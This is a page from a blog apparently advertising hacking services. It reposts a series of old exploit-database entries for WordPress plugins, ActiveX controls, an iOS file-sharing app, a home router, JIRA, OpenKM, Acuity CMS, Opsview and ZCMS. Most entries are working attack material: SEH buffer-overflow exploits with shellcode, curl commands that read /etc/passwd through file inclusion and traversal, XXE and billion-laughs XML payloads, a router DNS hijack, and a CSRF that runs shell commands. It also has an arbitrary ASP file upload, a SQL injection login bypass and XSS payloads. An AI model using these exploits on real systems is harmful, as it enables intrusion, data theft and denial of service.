Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863544815

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Wordpress Really Simple Guest Post File Include
# Google Dork: inurl:"really-simple-guest-post" intitle:"index of"
# Date: 04/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/really-simple-guest-post/
# Version: <=1.0.6
# Tested on: Linux

The vulnerable file is called:
simple-guest-post-submit.php and its full path is
/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php
The vulnerable code is as follows:
(line 8)
require_once($_POST["rootpath"]);
As you can see, the require_once function includes a data based on
user-input without any prior verification.
So, an attacker can exploit this flaw and come directly into the url
/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php
and send a post data like: "rootpath=the_file_to_include"

Proof of concept:
curl -X POST -F "rootpath=/etc/passwd" --url
http://localhost/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php
which will print out the content of /etc/passwd file.

Greats to Black Sniper & Moh Ooasiic
by Kuroi'SH
HireHackking 
<html>
<br>1 Click Audio Converter Activex Buffer Overflow</br>
<br>Affected version=2.3.6</br>
<br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br>
<br>Software Link:www.dvdvideotool.com/1ClickAudioConverter.exe</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
<br>SkinCrafter.dll version.1.9.2.0</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<!--Video Poc: http://bit.ly/1GmOAyq -->
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 2048) junk1+="A";
nseh = "\xeb\x06\x90\x90";
seh = "\xD7\x51\x04\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 2048) junk2+="B";
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg1=arg1;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
</script>
</html>
HireHackking 
<html>
<br>1 Click Extract Audio Activex Buffer Overflow</br>
<br>Affected version=2.3.6</br>
<br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br>
<br>Software Link:www.dvdvideotool.com/1ClickExtractAudio.exe</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
<br>SkinCrafter.dll version.1.9.2.0</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<!--Video Poc: http://bit.ly/1SYwV3u -->
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 2048) junk1+="A";
nseh = "\xeb\x06\xff\xff";
seh = "\x58\xE4\x04\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 2048) junk2+="B";
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg1=arg1;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
</script>
</html>
HireHackking 
# Exploit Title: WiFi HD 8.1 - Directory Traversal and Denial of Service
# Date: 2015-05-27
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Vendor Homepage: http://www.savysoda.com
# Software Link: http://www.savysoda.com/WiFiHD/
# Version: 8.1 (Apr 1, 2015)
# Tested on: iPhone

Disclosure Timeline:
* 2015-05-30: Vendor notified via email.
* 2015-06-05: No reponse from the vendor. Advisory released.


Software description:
=====================
WiFi HD is an iOS app which allows users to share files between their iPhone and PC by running a web server, FTP server, or SMB server on the iPhone or through various cloud services. 


Vulnerabilities:
================
The web server (titled "WiFi" in the app) is vulnerable to multiple directory traversal issues which allow an attacker to download, upload, create, or delete any file to which the app has access. The SMB server (titled "Shared Folder") is vulnerable to a Denial of Service attack when issued the command, "dir -c", within smbclient. It also discloses a listing of all readable files within the iPhone's file system via the IPC$ share.


Web Server Proof-of-Concept
===========================
Read arbitrary files/folders:
    Read /etc/passwd:
        curl "http://[TARGET IP]/../../../../../../../../etc/passwd"
    List contents of the /tmp directory:
        curl "http://[TARGET IP]/../../../../../../../../tmp/"

Create Folders:
    Create the folder, "/tmp/PoC-Folder":
        curl -d 'foldername=/../../../../../../../../tmp/PoC-Folder&button=Create+Folder' "http://[TARGET IP]/"
    
Delete Files/Folders:
    Delete the folder, "/tmp/PoC-Folder":
        curl 'http://[TARGET IP]/!DEL!/../../../../../../../../tmp/PoC-Folder'
                                  
Upload a File:
    Upload /etc/services to /tmp/example.txt:
        curl -F 'file=@/etc/services;filename=/../../../../../../../../tmp/example.txt' -F 'button=Submit' 'http://[TARGET IP]/'

    
SMB Server Proof-of-Concept
===========================
Denial of Service:
    smbclient -N -c 'dir \' //[TARGET IP]/IPC$
    
Browse the iPhone's Filesystem:
    smbclient -N //[TARGET IP]/IPC$
HireHackking 
  Broadlight Residential Gateway DI3124 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!

  ShodanHQ Dork:
  Server: thttpd/2.25b 29dec2003 Content-Length: 348414


[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/getdns.cgi?"
{"success":true,"totalCount":2,"rows":[{"domain":"googleDNS1","serverip":"8.8.8.8","type":"manual"},
{"domain":"googleDNS2","serverip":"8.8.4.4","type":"manual"}]}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/savedns.cgi?domainname=evilDNS&domainserverip=133.71.33.7"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/deldns.cgi?serverip=8.8.8.8"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/deldns.cgi?serverip=8.8.4.4"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/getconf.cgi" | egrep '(username|password)'
<username>admin</username>
<password>admin</password>
HireHackking 
source: https://www.securityfocus.com/bid/53585/info

The Unijimpe Captcha is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/captchademo.php/%22%3E%3Cscript%3Ealert%28%27pwned%27%29%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/53586/info

Artiphp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Artiphp 5.5.0 Neo is vulnerable; other versions may also be affected. 

POST /artpublic/recommandation/index.php HTTP/1.1
Content-Length: 619
Content-Type: application/x-www-form-urlencoded
Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

add_img_name_post			"onmouseover=prompt(1) joxy
adresse_destinataire			
adresse_expediteur			lab%40zeroscience.mk
asciiart_post				"onmouseover=prompt(2) joxy
expediteur				"onmouseover=prompt(3) joxy
message					Hello%20World
message1				%ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
send					Send
titre_sav				"onmouseover=prompt(4) joxy
url_sav					http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
z39d27af885b32758ac0e7d4014a61561	"onmouseover=prompt(5) joxy
zd178e6cdc57b8d6ba3024675f443e920	2
HireHackking 
source: https://www.securityfocus.com/bid/53598/info

PHP Address Book is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

PHP Address Book 7.0 is vulnerable; other versions may also be affected. 

http://www.example.com/addressbookv7.0.0/group.php/[XSS]

http://www.example.com/addressbookv7.0.0/translate.php?lang=en&target_language=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/53595/info

JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data.

Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.

The following versions are affected:

Versions prior to JIRA 5.0.1 are vulnerable.
Versions prior to Gliffy 3.7.1 are vulnerable.
Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable. 

POST somehost.com HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 1577

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:authenticateApplication>
         <urn:in0>
            <aut:credential>
               <aut:credential>stuff1</aut:credential>
               <aut:encryptedCredential>?&lol9;</aut:encryptedCredential>
            </aut:credential>
            <aut:name>stuff3</aut:name>
            <aut:validationFactors>
               <aut:ValidationFactor>
                  <aut:name>stuff4</aut:name>
                  <aut:value>stuff5</aut:value>
               </aut:ValidationFactor>
            </aut:validationFactors>
         </urn:in0>
      </urn:authenticateApplication>
   </soapenv:Body>
</soapenv:Envelope>
HireHackking 
source: https://www.securityfocus.com/bid/53602/info

OpenKM is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected application.

OpenKM 5.1.7 is vulnerable; other versions may also be affected. 

Login as administrator (having the AdminRole) and call the URL in a
different
browser window
http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3
D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%
2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B
 
Alternatively the administrator could browse a prepared HTML page in a
new tab
<html>
<body>
<script>
img = new Image();
img.src="http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%
5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3
E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B"
</script>
</body>
</html>
 
The above exploit does nothing else than just creating a file in /tmp
 
String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"};
Runtime.getRuntime().exec(cmd);
 
Some might also want to browse directories
http://www.example.com/OpenKM/admin/scripting.jsp?script=import+java.io.*%3B
%0D%0A%0D%0Atry+%7B%0D%0A++++String+ls_str%3B%0D%0A++++Process+ls_proc+%
3D+Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fls+-lah%22%29%3B%0D%0A+++
+DataInputStream+ls_in+%3D+new+DataInputStream%28ls_proc.getInputStream%
28%29%29%3B%0D%0A%0D%0A++++while+%28%28ls_str+%3D+ls_in.readLine%28%29%2
9+%21%3D+null%29+++++++++++%0D%0A++++++++print%28ls_str+%2B+%22%3Cbr%3E%
22%29%3B%0D%0A%0D%0A%7D+catch+%28IOException+e%29+%7B%0D%0A%7D
HireHackking 
source: https://www.securityfocus.com/bid/53603/info

The FishEye and Crucible plugins for JIRA are prone to an unspecified security vulnerability because they fail to properly handle crafted XML data.

Exploiting this issue allows remote attackers to cause denial-of-service conditions or to disclose local sensitive files in the context of an affected application.

FishEye and Crucible versions up to and including 2.7.11 are vulnerable. 

Burp Repeater
Host: somehost.com
Port 443


POST /crowd/services/test HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 2420

<!DOCTYPE foo [<!ENTITY xxec6079 SYSTEM "file:///etc/passwd"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com" xmlns:soap="http://soap.integration.crowd.atlassian.com">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:addAllPrincipals>
         <urn:in0>
            <!--Optional:-->
            <aut:name>?</aut:name>
            <!--Optional:-->
            <aut:token>?</aut:token>
         </urn:in0>
         <urn:in1>
            <!--Zero or more repetitions:-->
            <soap:
SOAPPrincipalWithCredential>
               <!--Optional:-->
               <soap:passwordCredential>
                  <!--Optional:-->
                  <aut:credential>?</aut:credential>
                  <!--Optional:-->
                  <aut:encryptedCredential>?&xxec6079;</aut:encryptedCredential>
               </soap:passwordCredential>
               <!--Optional:-->
               <soap:principal>
                  <!--Optional:-->
                  <soap:ID>?</soap:ID>
                  <!--Optional:-->
                  <soap:active>?</soap:active>
                  <!--Optional:-->
                  <soap:attributes>
                     <!--Zero or more repetitions:-->
                     <soap:SOAPAttribute>
                        <!--Optional:-->
                        <soap:name>?</soap:name>
                        <!--Optional:-->
                        <soap:values>
                           <!--Zero or more repetitions:-->
                           <urn:string>?</urn:string>
                        </soap:values>
                     </soap:SOAPAttribute>
                  </soap:attributes>
                  <!--Optional:-->
                  <soap:conception>?</soap:conception>
                  <!--Optional:-->
                  <soap:description>?</soap:description>
                  <!--Optional:-->
                  <soap:directoryId>?</soap:directoryId>
                  <!--Optional:-->
                  <soap:lastModified>?</soap:lastModified>
                  <!--Optional:-->
                  <soap:name>?</soap:name>
               </soap:principal>
            </soap:SOAPPrincipalWithCredential>
         </urn:in1>
      </urn:addAllPrincipals>
   </soapenv:Body>
</soapenv:Envelope>
HireHackking 
source: https://www.securityfocus.com/bid/53616/info

Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.

An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process.

Acuity CMS 2.6.2 is vulnerable; prior versions may also be affected. 

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX

-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="path"

/images
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootpath"

/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootdisplay"

http://localhost/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="status"

confirmed
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="action"

fileUpload
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="file1"; filename="0wned.asp"
Content-Type: application/octet-stream

<% response.write("0wned!") %>

-----------------------------6dc3a236402e2--
HireHackking 
source: https://www.securityfocus.com/bid/53616/info
 
Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.
 
An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process.
 
Acuity CMS 2.6.2 is vulnerable; prior versions may also be affected. 


http://www.example.com/admin/file_manager/browse.asp?field=&form=&path=../../
HireHackking 
# Exploit Title: wp-imagezoom Remote Image Upload
# Google Dork: filetype:php inurl:"/wp-content/plugins/wp-imagezoom" & inurl:"?id="
# Date: 06.06.2015
# Exploit Author: T3N38R15
# Software Link: https://downloads.wordpress.org/plugin/wp-imagezoom.1.1.0.zip
# Version: 1.1.0
# Tested on: 	Windows	(Firefox)
		Linux	(Firefox)

The affected file is the div_img.php it allowed anybody to upload jpg files.
/wp-content/plugins/wp-imagezoom/div_img.php?src=http://domain.com/img.jpg&cl=100&dl=100
would upload the file to the default directory :
/wp-content/plugins/wp-imagezoom/work/http_cln__sls__sls_domain.com_sls_img.jpg/
the first one is then your picture ( it is only 469x469 the rest is cut out ), the other are zoomed/cuttet version of it.

it also support a FPD : 
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=
the variable org_img have the value of the current location to the work directory.

We can also delete entry's with
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=
following options are avaliable for the cmd parameter :
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delall
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delunn
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delone&src=yourwisheddeleted
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delovr&maxsize=size of image

Proof of concept : http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=http://static.zerochan.net/Frankenstein.(Noblesse).full.415661.jpg&cl=100&dl=100

Greets to Team Madleets/leets.pro & VIRkid ;)
Regards T3N38R15
HireHackking 
# Exploit title: Opsview 4.6.2 - Multiple XSS
# Date: 07-06-2015
# Vendor homepage: www.opsview.com
# Version: 4.6.2
# CVE: CVE-2015-4420
# Author: Dolev Farhi @dolevf
# Tested On: Kali Linux + Windows 7

# Details:
# --------
# Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version



1. Stored XSS through a malicious check plugin

a. Create a plugin with the following content:

#!/bin/bash
echo '<script>alert("script0t0s")</script>'
exit 2

b. create a new check and assign this plugin.

c. once a host uses this check, navigate to the event page, the XSS will be injected.

d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement.



2. Stored XSS in host profile

a. add a host

b. in the description of the host, add a description as the one below:
<script>alert(document.cookie)</script>

c. save settings

d. once a user/admin views the host settings, XSS will be injected.


3. Reflected XSS in Test service check page.
a. Add a new service check

b. Test the new service check against any host and provide in the command line the following <script>alert("test")</script>

c. the XSS will immediately reflect to the screen.

response output:

POST /state/service/166/exec HTTP/1.1
Host: 192.168.0.20
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview
Content-Length: 105
Cookie: PHPSESSID=
auth_tkt=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915
HireHackking 
# Exploit Title:  SQL Injection & Persistent XSS
# Google Dork: intitle: SQL Injection & Persistent XSS
# Date: 2015-06-12
# Exploit Author:  John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: zencherry.com
# Software Link: sourceforge.net/projects/zencherrycms
# Version: 1.1
# Tested on: windows 7 on Apache Tomcat
# Category: webapps


Vendor:
=============================================
http://zencherry.com/
http://sourceforge.net/projects/zencherrycms



Product:
==================================================
ZCMS 1.1 JavaServer Pages Content Management System



Advisory Information:
==============================
SQL Injection & Persistent XSS



Vulnerability Details:
======================
SQL Injection (CVE-2015-7346):
Login to admin area requires a password but is easily bypassed
using classic SQLInjection method because application uses
concatenated user input to construct SQL queries.


ZCMS exploitable admin login code:
==================================
squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users
WHERE
status = 0 AND username = '"+username+"' AND password =
'"+request.getParameter("pass") +"' AND type = 1 ;";


So we just supply an Admin password like --->  HELL' OR '2'='2
which will resolve as true!


SQL Inject XSS Payload:
=======================
We can also inject persisten XSS payload directly to MySQL database
subverting
all character filtering leveraging existing SQLInjection vulnerabilities.


Persistent XSS (CVE-2015-7347):
===============

Another persistent XSS vector is here in author field for comments:
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page
number]


Exploit code(s):
===============

1) Bypass admin login
---------------------
localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login
Enter 'admin' for username field
Enter HELL' OR '2'='2 for the pass field


2) Inject XSS using SQL Injection
---------------------------------
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title=
"<script>alert(1)</script>
&content=<script>alert(1)</script>&author=<script>alert(1)</script>
SATAN&visibility=1&type=1&comm=0


3) Persistent XSS field
-----------------------
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page
number]
Inject <script>alert(666)</script> in author input field.



Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 12, 2015 : Public Disclosure



Severity Level:
=========================================================
High



Description:
==========================================================

Request Method(s):         [+] GET & POST


Vulnerable Product:        [+] ZCMS_1.1


Vulnerable Parameter(s):   [+] pass, title, content, author


Affected Area(s):          [+] Admin, CMS


===============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that
it is not altered except by reformatting it, and that due credit is given.
Permission is
explicitly given for insertion in vulnerability databases and similar,
provided that
due credit is given to the author. The author is not responsible for any
misuse of the
information contained herein and prohibits any malicious use of all
security related
information or exploits by the author or elsewhere.


(hyp3rlinx)
HireHackking 
Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
Vendor: https://profiles.wordpress.org/sedevelops/
Vendor Notified: 2015-06-06
Vendor Contact: https://profiles.wordpress.org/sedevelops/
Description: 
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.

Vulnerability:
The se-html5-album-audio-player v1.1.0  plugin for wordpress has a remote file download vulnerability.  The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../.

This vulnerability doesn’t require authentication to the Wordpress site.

File ./se-html5-album-audio-player/download_audio.php:

3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
5 // make sure it's a file before doing anything!
6 if( is_file($file_name) && $is_in_uploads_dir !== false ) {
7 
8         // required for IE
9         if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off');         }
10     
11         // get the file mime type using the file extension
12         switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
13                 case 'pdf': $mime = 'application/pdf'; break;
14                 case 'zip': $mime = 'application/zip'; break;
15                 case 'jpeg':
16                 case 'jpg': $mime = 'image/jpg'; break;
17                 default: $mime = 'application/force-download';
18         }
19         header('Pragma: public');       // required
20         header('Expires: 0');           // no cache
